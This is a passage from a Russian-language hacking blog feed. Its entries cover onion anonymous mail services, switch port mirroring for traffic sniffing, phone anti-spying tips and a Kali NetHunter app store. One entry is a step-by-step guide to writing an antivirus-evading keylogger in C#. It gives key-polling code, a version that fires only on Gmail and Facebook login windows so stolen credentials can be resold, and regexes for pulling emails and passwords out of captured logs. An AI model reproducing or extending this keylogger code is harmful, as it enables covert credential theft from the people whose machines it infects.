  &lt;p&gt;100% зашифрованные письма, в отличие от обычных SMTP-писем, которые мы используем с поставщиками clearnet без какого-либо шифрования (такого уровня!)&lt;/p&gt;
  &lt;p&gt;На общедоступном сервере нет хранилища файлов и почты, это разрешено только серверу получателя.&lt;/p&gt;
  &lt;p&gt;Федеративные серверы убедитесь, что сертификаты SSL всегда актуальны и функционируют!&lt;/p&gt;
  &lt;p&gt;Пользователь получает возможность выбрать сервер ввода/вывода узлов!&lt;/p&gt;
  &lt;p&gt;Защищенный асимметричными ключами, этот вид защиты включает в себя ваш пароль и ключи сервера для защиты.&lt;/p&gt;
  &lt;p&gt;Позволяет устанавливать пользовательские, личные черные списки, что помогает убедиться, что в вашем почтовом ящике есть минимум спама.&lt;/p&gt;
  &lt;p&gt;Короче говоря, это довольно безопасный и надежный анонимный почтовый сервис. Хотя один фактор, который я хотел бы упомянуть, заключается в том, что он не шифрует автоматически PGP ваши электронные письма, и это то, о чем вы должны позаботиться с вашего собственного конца.&lt;/p&gt;
  &lt;h3&gt;5. SinBox&lt;/h3&gt;
  &lt;p&gt;&lt;a href=&quot;http://sinbox4ywhkabur3.onion/&quot; target=&quot;_blank&quot;&gt;Лук URL: http://sinbox4ywhkabur3.onion/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;SinBox является одним из самых простых анонимных почтовых сервисов в сети Tor. Он не имеет URL-адреса clearnet и абсолютно не связан с clearnet.&lt;/p&gt;
  &lt;p&gt;Это децентрализованная служба, которая гарантирует, что шифрование, расшифровка и аутентификация выполняются локально.&lt;/p&gt;
  &lt;p&gt;На самом деле, вам предоставляется частный “ключ”, который вам нужно загрузить и сохранить. Это похоже на ваш” ключ аутентификации&amp;quot;, и Sinbox его не хранит. Он необходим для входа в вашу учетную запись и автоматически удаляется с серверов Sinbox, как только вы выходите из системы.&lt;/p&gt;
  &lt;p&gt;Помимо отправки электронной почты, другие &amp;quot;ребра&amp;quot; включают в себя возможность отправлять и получать файлы, включая фотографии, видео и другие носители.&lt;/p&gt;
  &lt;p&gt;И более того, он “неограничен”. Таким образом, вы можете использовать столько места для ваших почтовых требований, сколько пожелаете.&lt;/p&gt;

</content></entry><entry><id>darksoft:kJfMQaAZL</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/kJfMQaAZL?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Как перехватить трафик в коммутируемой среде?</title><published>2020-07-21T08:00:46.337Z</published><updated>2020-07-21T08:00:46.337Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/26/f3/26f3f9a2-a62d-4ac3-afc5-1640be48fca1.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/39/2c/392c0ee2-6218-4d84-93cd-834e4b68ac75.png&quot;&gt;Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования, а также специалистов по информационной безопасности для выявления аномальной сетевой активности вредоносного программного обеспечения.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/39/2c/392c0ee2-6218-4d84-93cd-834e4b68ac75.png&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Анализ сетевого трафика всегда был неотъемлемой частью работы любого сетевого инженера, администратора сети для выявления проблем работоспособности и конфигурации активного оборудования, а также специалистов по информационной безопасности для выявления аномальной сетевой активности вредоносного программного обеспечения.&lt;/p&gt;
  &lt;p&gt;Анализ перехваченных пакетов безусловно требует от специалиста наличие глубоких знаний в области сетевых технологий, а также навыков работы с программным обеспечением анализаторов пакетов, таким например, как всем известный wireshark, так как необходимо знать синтаксис фильтров, уметь быстро находить интересующие протоколы и т.д.&lt;/p&gt;
  &lt;p&gt;Но гораздо сложнее это трафик перехватить, точнее установить оборудование для его перехвата.&lt;/p&gt;
  &lt;h3&gt;Так как же перехватить трафик?&lt;/h3&gt;
  &lt;h3&gt;Как расположить и настроить оборудование для прослушивания ?&lt;/h3&gt;
  &lt;p&gt;Предлагаю рассмотреть варианты расположения (подключения) оборудования для снифа в коммутируемой среде (перехват wi-fi канала рассмотрим в следующей статье).&lt;/p&gt;
  &lt;p&gt;Самым удобным способ является установка сниффера непосредственно на интересующем нас прослушиваемом хосте.&lt;/p&gt;
  &lt;p&gt;Однако часть трафика, весьма полезная для исследования, но не предназначенное конечному устройству будет отбрасываться сетевым интерфейсом и не передаваться на обработку в систему, а значит и захватить этот трафик для дальнейшего исследования мы не сможем. К такому трафику относятся широковещательный трафик в рамках работы коммутатора.&lt;/p&gt;
  &lt;p&gt;К примеру ARP запрос, который используют хосты для определения MAC-адреса, который соответствует определенному IP-адресу.&lt;/p&gt;
  &lt;p&gt;Зная IP, направляем ARP запрос с целью сопоставления IP-MAC всем устройствам внутри широковещательного домена.&lt;/p&gt;
  &lt;p&gt;Однако только искомый хост «заинтересован» в получении такого запроса, остальные хосты, как упоминалось выше, указанный пакет отбросят.&lt;/p&gt;
  &lt;p&gt;Для наглядности, с помощью Cisco Packet racer, рассмотрим как хост с IP-адресом 192.168.1.2 направляет ARP запрос на хост 192.168.1.4.&lt;/p&gt;
  &lt;p&gt;Предварительно проверив, что ARP записей на 192.168.1.2 нет от слова совсем командой arp -a (удалить их можно с помощью arp -d) выполняем команду ping на 192.168.1.4.&lt;/p&gt;
  &lt;p&gt;Так как мы не знаем MAC адрес, то первоначально направляем ARP запрос. Запрос приходит на коммутатор (cisco 2960), далее он направляется на все хосты, подключенные к коммутатору. После этого хост 192.168.1.3 отбрасывает указанный, а 192.168.1.4 соответственно отвечает.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://itsecforu.ru/wp-content/uploads/2020/02/1-1.png&quot; width=&quot;1253&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Для того, чтобы захватывать весь поступающий траффик на 192.168.1.3 необходимо на сетевом интерфейсе&lt;strong&gt; включить смешанный режим раюоты&lt;/strong&gt;. Это позволяют сделать программные компоненты Aircrack-ng, Wireshark, tcp dump идр.&lt;/p&gt;
  &lt;p&gt;Когда нет возможности разместить анализатор трафика на целевом хосте &lt;strong&gt;помочь может концентратор&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;В таком случае исследуемый хост и анализатор трафика в одном коммутируемом сегменте сети подключаются к одному концентратору.&lt;/p&gt;
  &lt;p&gt;В результате все поступающие и исходящие пакеты будут проходить по всем портам концентратора.&lt;/p&gt;
  &lt;p&gt;Так например, отправив пакеты с Host1 на Host2, концентратор Hub0 направит их как на исследуемый Host2, так и на анализатор пакетов Sniffer.&lt;/p&gt;
  &lt;p&gt;Отброс пакетов Sniffer’ом на картинке, обусловлен отключенным смешанным режимом работы сетевого адаптера.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://itsecforu.ru/wp-content/uploads/2020/02/2-1.png&quot; width=&quot;934&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Самым популярным способом перехвата трафика остается &lt;strong&gt;метод зеркалирование портов&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Для реализации этого метода необходимо чтобы коммутатор был управляемым, а также иметь физический или через удаленный ssh/Web-интерфейс доступ к нему.&lt;/p&gt;
  &lt;p&gt;Смысл заключается в том, чтобы принимаемый и отправляемый трафик устройства подключённого к порту коммутатора — зеркально направлялся на другой порт коммутатора, куда подключен анализатор трафика.&lt;/p&gt;
  &lt;p&gt;Так, подключившись, настроим коммутатор Сisco 2960 для зеркалирования трафика на портах fastEthernet 0/1 и fastEthernet 0/2 куда подключены host1 и host2 соответственно:&lt;/p&gt;
  &lt;pre&gt;Switch&amp;gt;enable
Switch#conf terminal
Switch(config)#monitor session 1 source interface fastEthernet 0/1
Switch(config)#monitor session 1 source interface fastEthernet 0/2
&lt;/pre&gt;
  &lt;p&gt;И порт, на который будет зеркалироваться трафик, куда подключен анализатор пакетов :&lt;/p&gt;
  &lt;pre&gt;Switch(config)#monitor session 1 destination interface f0/24
&lt;/pre&gt;
  &lt;p&gt;Проверим:&lt;/p&gt;
  &lt;pre&gt;Switch#show monitor
Session 1
---------
Type                   : Local Session
Description            : -
Source Ports           :
Both               : Fa0/1,Fa0/2
Destination Ports      : Fa0/24
Encapsulation      : Native
Ingress      : Disabled
&lt;/pre&gt;
  &lt;p&gt;Итак направим пакеты от Host1 (192.168.1.1) на Host2( 192.168.1.2) и видим, что они зеркалируются коммутатором наш сниффер:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://itsecforu.ru/wp-content/uploads/2020/02/4-1.png&quot; width=&quot;906&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Открываем перехваченный ICMP пакет на снифере:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://itsecforu.ru/wp-content/uploads/2020/02/5-1.png&quot; width=&quot;589&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Указанные методы не лишены недостатков, а другие методы перехвата сетевого трафика — такие как заражение ARP-кэша и применение сетевых ответвителей рассмотрим в следующих статьях.&lt;/p&gt;

</content></entry><entry><id>darksoft:HuYl-L7Iy</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/HuYl-L7Iy?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>15 советов для защиты от шпионажа за смартфоном</title><published>2020-07-18T09:36:22.387Z</published><updated>2020-07-18T09:36:22.387Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/f4/58/f458fffb-fb49-404d-81ad-009fb6d5452b.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/2e/65/2e654cdb-587c-49db-8da9-d981a334f1c0.png&quot;&gt;В этой статье были перечислены основные способы, о которых нужно знать для защиты телефона от шпионажа.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/2e/65/2e654cdb-587c-49db-8da9-d981a334f1c0.png&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В этой статье были перечислены основные способы, о которых нужно знать для защиты телефона от шпионажа.&lt;/p&gt;
  &lt;p&gt;Мобильные телефоны уже давно стали неотъемлемой частью нашего личного пространства. Однако с ростом числа киберпреступлений и популярностью приложений от сторонних разработчиков, конфиденциальность данных, хранимых на мобильных устройствах, все чаще подвергается угрозам разного рода. Компании и кибермошенники изобретают разные способы, чтобы получить доступ к личной информации для последующего использования в собственных целях.&lt;/p&gt;
  &lt;p&gt;С другой стороны, большинство пользователей не хотят, чтобы персональные данных попали в чужие руки, особенно без разрешения, и в этой статье мы рассмотрим способы защиты от шпионажа за вашим телефоном со стороны хакеров, сторонних приложений, близких родственников и т.п.&lt;/p&gt;
  &lt;p&gt;1. Никогда не оставляйте свой телефон без присмотра&lt;/p&gt;
  &lt;p&gt;Первое и самое главное: постоянно следите и никогда не оставляйте телефон на столике в кафе, на скамейке в парке и других общедоступных местах, поскольку некоторые злоумышленники специализируются на кражах подобного рода.&lt;/p&gt;
  &lt;p&gt;2. Никому не давайте телефон&lt;/p&gt;
  &lt;p&gt;Даже маме. В этом случае возникают риски, связанные с установкой приложений для шпионажа или с посещением вредоносных сайтов.&lt;/p&gt;
  &lt;p&gt;3. Избегайте подключений к публичным беспроводным сетям без VPN&lt;/p&gt;
  &lt;p&gt;Во время нахождения в общественных местах старайтесь не подключаться к публичным Wi-Fi сетям, поскольку хакер может легко проникнуть эту сеть или создать поддельную точку доступа и после подключения получить доступ к вашим данным. Если подключаться все же необходимо, используйте надежный VPN.&lt;/p&gt;
  &lt;p&gt;4. Регулярно обновляйте приложения&lt;/p&gt;
  &lt;p&gt;Старайтесь использовать последние версии приложений и устанавливайте последние обновления. Иногда патчи исправляют проблемы с безопасностью, которые могут быть использованы злоумышленником.&lt;/p&gt;
  &lt;p&gt;5. Отключите микрофон в телефоне&lt;/p&gt;
  &lt;p&gt;Во время шпионажа может быть задействовать микрофон, который желательно отключить. Вне зависимости от того, какое у вас устройство (iPhone или на базе ОС Android), вы можете отслеживать, у какого приложения есть доступ к микрофону через настройки.&lt;/p&gt;
  &lt;p&gt;6. Будьте осторожны с используемыми приложениями&lt;/p&gt;
  &lt;p&gt;Не все приложения в магазинах App Store и Google Play являются легитимными. Многие приложения от сторонних разработчиков пытаются получать о вас как можно больше информации, о чем обычно упоминается в тексте «Terms &amp;amp; Conditions», с которым вы должны согласиться, даже если не читали. Прежде чем загружать и использовать какую-либо программу, потратьте некоторое время и ознакомьтесь с этим текстом.&lt;/p&gt;
  &lt;p&gt;7. Используйте безопасный веб-браузер&lt;/p&gt;
  &lt;p&gt;Если вы ведете бизнес в сети или делаете покупки с телефона, важно, чтобы веб-серфинг был безопасным, и информация о вашем банковском счете, кредитной карте или номере социального страхования не оказалась в руках злоумышленников. Для защиты данных во время работы в интернете используйте браузеры &lt;a href=&quot;https://brave.com/&quot; target=&quot;_blank&quot;&gt;Brave&lt;/a&gt;, &lt;a href=&quot;https://duckduckgo.com/app&quot; target=&quot;_blank&quot;&gt;DuckDuckGo&lt;/a&gt; и &lt;a href=&quot;https://www.mozilla.org/en-GB/firefox/mobile/&quot; target=&quot;_blank&quot;&gt;Firefox Focus&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;8. Ограничьте или запретите отслеживание в маркетинговых целях&lt;/p&gt;
  &lt;p&gt;В большинстве приложений и смартфонах вы можете ограничить или совсем запретить отслеживание и сбор данных, используемых для показа более актуальных рекламных объявлений. Кроме того, нет никаких гарантий, что собранная информация не будет использоваться и в других целях.&lt;/p&gt;
  &lt;p&gt;9. В случае отсутствия необходимости отключите Wi-Fi и Bluetooth&lt;/p&gt;
  &lt;p&gt;Рекомендуется отключать на телефоне Wi-Fi и Bluetooth в случае отсутствия необходимости, поскольку при подключении к публичным сетям ваш смартфон может быть скомпрометирован. Во время прогулки или путешествия ваш телефон непреднамеренно может подключиться к ближайшей незащищенной сети.&lt;/p&gt;
  &lt;p&gt;10. Пользуйтесь антивирусом&lt;/p&gt;
  &lt;p&gt;Как и в случае с компьютером, антивирус можно использовать для защиты смартфона от вредоносных приложений или отдельных участков кода. После обнаружения подозрительной программы происходит помещение на карантин, пока не наступили серьезные последствия.&lt;/p&gt;
  &lt;p&gt;11. Не кликайте на подозрительные ссылки&lt;/p&gt;
  &lt;p&gt;Если кто-то, кого вы не знаете, просит кликнуть на ссылку, ни в коем случае не кликайте. Часто хакеры или мошенники пытаются украсть персональную или финансовую информацию, рассылая сообщения о хороших скидках или предлагая поучаствовать в лотерее. Вы можете получить ссылки по почте, в СМС, в мессенджерах или социальных сетях. Совет: пользуйтесь сервисом &lt;a href=&quot;https://virustotal.com/&quot; target=&quot;_blank&quot;&gt;VirusTotal&lt;/a&gt; для сканирования и проверки подозрительных ссылок и файлов.&lt;/p&gt;
  &lt;p&gt;12. Удаляйте неизвестные файлы и приложения&lt;/p&gt;
  &lt;p&gt;Часто, во время внимательного изучения содержимого телефона, можно заметить неизвестные загруженные файлы или установленные приложения, которые могут свидетельствовать о присутствии шпионов и других вредоносов. Периодически делайте профилактическую зачистку своего смартфона и удаляйте неизвестное содержимое и ненужные файлы.&lt;/p&gt;
  &lt;p&gt;13. Отключите отслеживание вашей активности в интернете и в приложениях&lt;/p&gt;
  &lt;p&gt;Хотя Google – отличный источник информации, но в то же время отслеживает вашу активность в интернете и приложениях с целью лучшей персонализации при использовании сервисов навроде Google Maps. &lt;a href=&quot;https://support.google.com/websearch/answer/54068?co=GENIE.Platform%3DDesktop&amp;hl=ru&amp;oco=0&quot; target=&quot;_blank&quot;&gt;В одном из справочных разделов Гугла&lt;/a&gt; можно узнать, как отключить отслеживание в Android и iPhone.&lt;/p&gt;
  &lt;p&gt;14. Используйте настройки безопасности телефона&lt;/p&gt;
  &lt;p&gt;Существует несколько настроек безопасности телефона, при помощи которых можно защититься от неправомерного физического доступа к устройству и приложениям. Двухфакторная аутентификация требует, чтобы пользователь телефона или приложения прошел две стадии перед получением доступа, которые могут включать ввод пароля, использования отпечатка или секретного кода.&lt;/p&gt;
  &lt;p&gt;Также существует несколько схем авторизации, включая Face ID или сканирование отпечатка, защиту при помощи пароля или графического ключа.&lt;/p&gt;
  &lt;p&gt;15. Сбросьте настройки телефона до заводских&lt;/p&gt;
  &lt;p&gt;Если ваш телефон уже скомпрометирован, вы можете воспользоваться сбросом настроек. Однако в этом случае вместе с вредоносами удалятся все ваши данные.&lt;/p&gt;
  &lt;h3&gt;&lt;u&gt;&lt;a href=&quot;https://t.me/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;HIDDEN COMMUNITY&lt;/a&gt;&lt;/u&gt; - информационная безопасность, хакинг, полезные статьи (&lt;u&gt;&lt;a href=&quot;https://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;зеркало&lt;/a&gt;&lt;/u&gt;)&lt;/h3&gt;

</content></entry><entry><id>darksoft:zyeIkgg_7</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/zyeIkgg_7?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Пишем свой кейлоггер с нулевым детектом. Пошаговый гайд</title><published>2020-07-17T12:46:57.577Z</published><updated>2020-07-17T12:46:57.577Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/2a/e0/2ae016a6-2d04-478a-a384-9d61c90c7308.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/a4/b5/a4b5b2f4-2750-4865-a1e5-184746fb7a02.png&quot;&gt;Сегодня мы расскажем и покажем, как создать свой кейлоггер, который не будет обнаружен ни одним из существующих антивирусов. А все это еще и бесплатно.
Интересно? Тогда погнали!</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a4/b5/a4b5b2f4-2750-4865-a1e5-184746fb7a02.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Сегодня мы расскажем и покажем, как создать свой кейлоггер, который не будет обнаружен ни одним из существующих антивирусов. А все это еще и бесплатно.&lt;br /&gt;Интересно? Тогда погнали!&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Введение&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;&lt;strong&gt;Кейлоггер&lt;/strong&gt; – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.&lt;/p&gt;
  &lt;p&gt;Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлоггеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.&lt;/p&gt;
  &lt;p&gt;Тем не менее создать базовые функции кейлоггера достаточно легко запрограммировать.&lt;br /&gt;Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлоггер стойким к перезагрузкам или пытаться сделать его абсолютно беспалевным, благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили. &lt;/p&gt;
  &lt;h2&gt;За дело!&lt;/h2&gt;
  &lt;p&gt;Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:&lt;/p&gt;
  &lt;pre&gt;1.  [DllImport(&amp;quot;user32.dll&amp;quot;)]
2.  
3.  public static extern int GetAsyncKeyState(Int32 i);
&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;GetAsyncKeyState&lt;/strong&gt; - эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:&lt;/p&gt;
  &lt;pre&gt;1.  while (true)
2.  {
3.  Thread.Sleep(100);
4.  for (Int32 i = 0; i &amp;lt; 255; i++)
5.  {
6.  int state = GetAsyncKeyState(i);
7.  if (state == 1 || state == -32767)
8.  {
9.  Console.WriteLine((Keys)i);
10. 
11. }
12. }
13. }
&lt;/pre&gt;
  &lt;p&gt;Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются хакеру, т.е. нам.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Умный кейлоггер&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?&lt;/p&gt;
  &lt;p&gt;Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлоггеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.&lt;/p&gt;
  &lt;p&gt;Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вторая версия кода:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;1.  while (true) 
2.  {
3.  IntPtr handle = GetForegroundWindow();
4.  if (GetWindowText(handle, buff, chars) &amp;gt; 0)
5.  {
6.  string line = buff.ToString();
7.  if (line.Contains(&amp;quot;Gmail&amp;quot;)|| line.Contains(&amp;quot;Facebook - Log In or Sign Up &amp;quot;))
8.  {
9.  //проверка клавиатуры 
10. }
11. }
12. Thread.Sleep(100);
13. }
&lt;/pre&gt;
  &lt;p&gt;Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.&lt;/p&gt;
  &lt;p&gt;Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Еще более умный кейлоггер&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Давайте предположим, что хакер смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.&lt;/p&gt;
  &lt;p&gt;Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:&lt;/p&gt;
  &lt;pre&gt;1.  //Ищем почтовый адрес
2.  ^[\w!#$%&amp;amp;&amp;#x27;*+\-/=?\^_&amp;#x60;{|}~]+(\.[\w!#$%&amp;amp;&amp;#x27;*+\-/=?\^_&amp;#x60;{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$
3.  
4.  
5.  //Ищем пароль
6.  (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])
&lt;/pre&gt;
  &lt;p&gt;Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (и найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.&lt;/p&gt;
  &lt;p&gt;Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.&lt;/p&gt;
  &lt;p&gt;Для C# это выглядит так:&lt;/p&gt;
  &lt;pre&gt;1.  Regex re = new Regex(@&amp;quot;^[\w!#$%&amp;amp;amp;&amp;#x27;*+\-/=?\^_&amp;#x60;{|}~]+(\.[\w!#$%&amp;amp;amp;&amp;#x27;*+\-/=?\^_&amp;#x60;{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$&amp;quot;);
2.  Regex re2 = new Regex(@&amp;quot;(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])&amp;quot;);
3.  string email = &amp;quot;Oded.awask@gmail.com&amp;quot;;
4.  string pass = &amp;quot;abcde3FG&amp;quot;;
5.  Match result = re.Match(email);
6.  Match result2 = re2.Match(pass);
&lt;/pre&gt;
  &lt;p&gt;Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Бесплатно и без детектов&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлоггера за 30 минут.&lt;/p&gt;
  &lt;p&gt;Остался один вопрос: действительно такое ПО будет не обнаруживаемым для антивирусных программ?&lt;/p&gt;
  &lt;p&gt;Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.&lt;/p&gt;
  &lt;p&gt;В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим.&lt;/p&gt;
  &lt;h3&gt;&lt;u&gt;&lt;a href=&quot;https://t.me/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;HIDDEN COMMUNITY&lt;/a&gt;&lt;/u&gt; - информационная безопасность, хакинг, полезные статьи (&lt;u&gt;&lt;a href=&quot;https://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;зеркало&lt;/a&gt;&lt;/u&gt;)&lt;/h3&gt;

</content></entry><entry><id>darksoft:QonyTygiO</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/QonyTygiO?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Хакерский Play Market: Kali NetHunter App Store</title><published>2020-07-15T12:44:04.028Z</published><updated>2020-07-15T12:44:04.028Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/86/fa/86fa2454-45a1-411a-a2da-e09e7d146f94.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/7f/c7/7fc7aa92-48ce-4165-be55-909e297b48ff.png&quot;&gt;Первоначально разработанная для удобного управления пакетами на устройствах NetHunter поняли, что хранилище NetHunter также должно быть доступно на устройствах, отличных от NetHunter. Итак, вот он, доступный каждому, кто хочет получить лучшее из обоих миров:</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/7f/c7/7fc7aa92-48ce-4165-be55-909e297b48ff.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Первоначально разработанная для удобного управления пакетами на устройствах NetHunter поняли, что хранилище NetHunter также должно быть доступно на устройствах, отличных от NetHunter. Итак, вот он, доступный каждому, кто хочет получить лучшее из обоих миров:&lt;/p&gt;
  &lt;p&gt;Простота использования и удобство Google Play Store&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Свобода, анонимность и конфиденциальность загружаемых приложений&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/4e65ce34c91e66a547f3a.png&quot; width=&quot;798&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;a href=&quot;https://store.nethunter.com/NetHunterStore.apk&quot; target=&quot;_blank&quot;&gt;Скачать можно по ссылке&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Kali NetHunter App Store&lt;/strong&gt; - это комплексное решение для безопасности приложений Android. Это идеальная альтернатива магазину Google Play для любого Android-устройства, рутированного или нет. Если вы ищете приложение безопасности для вашего устройства Android, NetHunter Store станет лучшим выбором.&lt;/p&gt;
  &lt;p&gt;Магазин NetHunter работает на слегка модифицированной версии F-Droid, благодаря тяжелой работе сообщества F-Droid, в частности Питера Сервайло, чья помощь была неоценимой. В то время как F-Droid устанавливает своих клиентов с отключенной телеметрией и запрашивает согласие перед отправкой отчетов о сбоях, здесь пошли еще дальше и удалили весь код - просто для того, чтобы конфиденциальность не могла быть нарушена случайно.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/28647135555bbc6b8bba9.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/0a9782e3c95b268177663.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
